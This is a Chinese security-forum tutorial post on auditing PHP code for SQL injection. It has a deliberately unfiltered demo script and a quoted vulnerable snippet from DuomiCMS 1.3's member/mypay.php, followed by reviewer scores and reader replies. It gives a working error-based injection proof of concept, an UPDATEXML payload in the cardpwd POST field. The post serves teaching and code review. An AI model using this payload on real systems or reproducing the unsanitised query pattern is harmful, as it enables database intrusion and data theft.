用户
搜索
  • TA的每日心情
    奋斗
    2019-2-12 19:27
  • 签到天数: 40 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    101

    主题

    584

    帖子

    1365

    魔法币
    收听
    0
    粉丝
    95
    注册时间
    2016-2-2

    楚燕春秋巡逻春秋游侠核心白帽i春秋签约作者突出贡献白帽高手秦齐赵春秋文阁积极活跃奖

    发表于 2016-9-3 17:31:34 1719995
    本帖最后由 MAX丶 于 2016-9-3 09:33 编辑

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到攻击.】

    通俗点讲就是没有严谨的过滤导致的】

    下面我们来讲解一下今天的东西代码如下。【还有就是数据库文件在我上一篇xss储存那一篇文章发布过了我就不在复制过来了,下面是我们的注入文件。】
    [PHP] 纯文本查看 复制代码
    <?php 
    mysql_connect('localhost','root','root');
    mysql_select_db('test');
    mysql_query("set names gbk");
    echo $id=$_GET["id"];
    echo "<br>";
    //echo $sql="select * from book where id='$
    $sql="select * from book where id=$id";
    if ($row=mysql_query($sql))
    {        
    $rows=mysql_fetch_array($row);
    var_dump($rows);
    }
    ?>


    QQ截图20160903171725.png

    首先我们看一下代码;
    [PHP] 纯文本查看 复制代码
    mysql_connect('localhost','root','root');
    mysql_select_db('test');
    mysql_query("set names gbk");

    这是数据库配配置。
    [PHP] 纯文本查看 复制代码
    echo $id=$_GET["id"];

    大家可以看见这是直接输出这个GET的值。
    [PHP] 纯文本查看 复制代码
    $sql="select * from book where id=$id";

    然后这里直接进行SQL语句的
    [PHP] 纯文本查看 复制代码
    ($row=mysql_query($sql))

    这里直接进行查询SQL语句
    [PHP] 纯文本查看 复制代码
    $rows=mysql_fetch_array($row)

    利用这一串代码直接取值
    [PHP] 纯文本查看 复制代码
    var_dump($rows)

    然后进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。】
    QQ截图20160903171217.png

    现在我给大家找个实例演示【并不是本人自己挖的】多米CMS最新版1.3版本注入.
    漏洞文件member/mypay.php(14-40行) 1.png
    [PHP] 纯文本查看 复制代码
    if(empty($_SESSION['duomi_user_id'])){
        showMsg("请先登录","login.php");
        exit();
    }
    elseif($dm=='mypay'){
        $key=$_POST['cardkey'];
        if($key==""){showMsg("请输入充值卡号","-1");exit;}
        $pwd=$_POST['cardpwd'];
        if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
        $sqlt="SELECT * FROM duomi_card where ckey='$key'";
        $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";
           $row1 = $dsql->GetOne($sqlt);
        if(!is_array($row1) OR $row1['status']<>0){
            showMsg("充值卡信息有误","-1");exit;
        }else{
            $uname=$_SESSION['duomi_user_name'];
            $points=$row1['climit'];
            $dsql->executeNoneQuery("UPDATE duomi_card SET    usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");
            $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");
            $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");
            showMsg("恭喜!充值成功!","mypay.php");exit;
        }
    }
    else
    {

    大家可以清楚看见此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行
    http://localhost/member/mypay.php?dm=mypay
    POST:cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1

    图片1.png


    评分

    参与人数 1价值分 +10 收起 理由
    zusheng + 10 价值分奖励

    查看全部评分

    本帖被以下淘专辑推荐:

    我欲将心向明月,奈何明月照沟渠。
                      天人照我本和兴,只是难易风化岩。
    发表于 2016-9-13 11:06:23
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!



    基本项加分项


    作者帖子标题内容要求内容稀缺性文章篇幅文章深度文章可读性是否系列文章排版优化总分奖金点评
    MAX丶PHP代码审计SQL注入篇211221110价值分篇幅太短,文章深度不行,思路不清晰


    Hacking the earth.My Blog:https://isbase.cc
    使用道具 举报 回复
    学习了一波  谢谢楼主的分享
    使用道具 举报 回复
    发表于 2017-2-6 19:11:21
      不错很好 辛苦
    使用道具 举报 回复
    66666666666666666
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    板凳
    发表于 2016-9-3 23:22:27
    衣服已备好
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    学习学习,谢谢分享
    使用道具 举报 回复
    发表于 2016-9-5 10:17:17
    使用道具 举报 回复
    发表于 2016-9-5 16:51:30
    感谢楼主。
    使用道具 举报 回复
    发表于 2016-9-6 10:47:34
    基础必须看 感谢分享
    使用道具 举报 回复
    发表于 2016-9-6 11:19:14
    一起学习咯
    使用道具 举报 回复
    发表于 2016-9-6 11:50:49
    学习一下了!谢谢了
    使用道具 举报 回复
    发表于 2016-9-6 12:22:31
    好吧,我看看
    使用道具 举报 回复
    发表于 2016-9-6 12:54:10
    辛苦了,看看哈
    使用道具 举报 回复
    发表于 2016-9-6 13:25:51
    来学习学习。。。。
    使用道具 举报 回复

    认真学习了!
    使用道具 举报 回复
    发表于 2016-9-15 17:28:26
    只看代码我竟然都懂,看来没白学
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册